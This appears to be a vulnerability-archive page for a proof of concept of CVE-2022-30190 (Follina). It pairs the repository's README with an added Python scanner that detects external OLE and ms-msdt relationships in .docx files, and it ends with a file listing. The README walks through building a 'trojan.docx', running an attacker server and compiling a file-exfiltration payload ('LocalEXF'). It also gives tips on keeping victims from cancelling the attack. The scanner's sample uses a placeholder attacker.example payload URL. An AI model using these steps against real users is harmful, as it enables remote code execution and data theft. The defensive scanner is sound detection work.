POC details: a4168f888c9658b962857b47f94e35079c709d52

Source
Related vulnerability
Title: Microsoft Windows Support Diagnostic Tool OS command injection vulnerability (CVE-2022-30190)
Description: Microsoft Windows Support Diagnostic Tool is a tool from Microsoft that collects information to send to Microsoft Support. Microsoft Windows Support Diagnostic Tool (MSDT) contains an operating system command injection vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows
Description
A proof of concept for CVE-2022-30190 (Follina).
Introduction
# CVE-2022-30190 (Follina)

[![build.yml](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/main.yml/badge.svg)](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/main.yml)
[![dependabot.yml](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/dependabot.yml/badge.svg)](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/dependabot.yml)

A proof of concept (PoC) for CVE-2022-30190 (Follina).

## Requirements

### Victim

- Windows 10 21H1 (equivalent/earlier)
- Security update KB5016616 uninstalled

### Attacker

- [Microsoft .NET SDK](https://dotnet.microsoft.com/en-us/download)
- Python 3.9 or later

## Configuration

Edit `config.xml` to modify the attacker's server hostname and port number.

```xml
<host>
  <name>{ hostname }</name>
  <port>{ port }</port>
</host>
```

## Usage

### Trojan

The following Python script will build the `trojan.docx` file and initialise the attacker's server.

```bash
python init.py
```

### Payload

Build the payload and remove all unnecessary binaries with the following.

```bash
dotnet publish LocalEXF
```

### Clean

Run the following batch script to permanently delete this directory and everything in it.

```ps1
.\destroy_all.bat
```

## Important Notes

- To execute complex PowerShell commands, like the one this PoC uses, the command **must** be Base64 encoded.

- [index.html](build/index.html) must contain at least 4096 bytes of data within the `<script>` tag.

- All arguments must be used as described within [href.txt](build/href.txt).

- Microsoft Word will not execute JavaScript from the [index.html](build/index.html) file, but for whatever reason a `location.href` assignment does work.

- For commands that invoke long running tasks, a troubleshooter will appear when the victim loads the document. The victim can inadvertently deny the attack by cancelling the troubleshooter. Ensure that the command runtime is short.
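The notes above describe a document whose payload is fetched from the attacker's server rather than embedded. Added here as a defender's example, not code from this repository: a scanner that opens a `.docx` as a zip, reads every `.rels` part (such as `word/_rels/document.xml.rels` in the snapshot below) and flags the two things a Follina-style file needs, an `oleObject` relationship marked `TargetMode="External"` or a target using the `ms-msdt:` handler scheme. The sample document, relationship IDs and `attacker.example` host are constructed for the demo.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# URI schemes that hand the target to a Windows protocol handler (MSDT, search).
HANDLER_SCHEME = re.compile(r"^\s*(ms-msdt|search-ms):", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return one finding per relationship that pulls remote content into the document.

    Flags (a) an oleObject relationship with TargetMode="External" (the object is
    fetched from a URL instead of being embedded) and (b) any target that uses a
    protocol-handler scheme such as ms-msdt:. Plain external hyperlinks are
    normal in documents and are left alone to avoid false positives.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                external_ole = rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL
                if external_ole or HANDLER_SCHEME.search(target):
                    findings.append(f"{name}: {rel.get('Id')} -> {target}")
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal, constructed .docx (just enough for the scanner) with the given rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: one benign hyperlink plus one external OLE object, the shape a
# Follina-style document takes. attacker.example:8000 is a placeholder, not a real host.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
      Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="http://attacker.example:8000/index.html" TargetMode="External"/>
</Relationships>"""
```

Running `scan_docx(build_sample_docx(SAMPLE_RELS))` reports only `rId2`; the benign hyperlink is ignored, and a target that switches to the `ms-msdt:` scheme is reported even when its relationship type is not `oleObject`.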
File snapshot

```text
[4.0K] /data/pocs/a4168f888c9658b962857b47f94e35079c709d52
├── [4.0K] build
│   ├── [4.0K] docx
│   │   ├── [1.3K] [Content_Types].xml
│   │   ├── [4.0K] docProps
│   │   │   ├── [ 789] app.xml
│   │   │   └── [ 792] core.xml
│   │   ├── [4.0K] _rels
│   │   └── [4.0K] word
│   │       ├── [4.0K] document.xml
│   │       ├── [1.8K] fontTable.xml
│   │       ├── [4.0K] _rels
│   │       │   └── [1013] document.xml.rels
│   │       ├── [3.3K] settings.xml
│   │       ├── [ 33K] styles.xml
│   │       ├── [4.0K] theme
│   │       │   └── [ 14K] theme1.xml
│   │       └── [ 906] webSettings.xml
│   ├── [ 365] href.txt
│   └── [7.3K] index.html
├── [ 59] config.xml
├── [ 239] destroy_all.bat
├── [2.4K] init.py
├── [4.0K] LocalEXF
│   ├── [ 874] LocalEXF.csproj
│   ├── [ 636] omnisharp.json
│   └── [4.0K] Scripts
│       ├── [4.0K] Helpers
│       │   ├── [ 539] GetFileEnumerator.cs
│       │   └── [ 600] XMLHelper.cs
│       ├── [4.0K] IO
│       │   ├── [ 490] FileSystem.cs
│       │   └── [ 410] Resources.cs
│       ├── [4.0K] Main.cs
│       ├── [4.0K] Network
│       │   ├── [ 601] Host.cs
│       │   └── [1.1K] Request.cs
│       └── [4.0K] Utils
│           └── [ 185] Utils.cs
├── [1.9K] README.md
└── [4.0K] server
    └── [ 928] __init__.py

14 directories, 27 files
```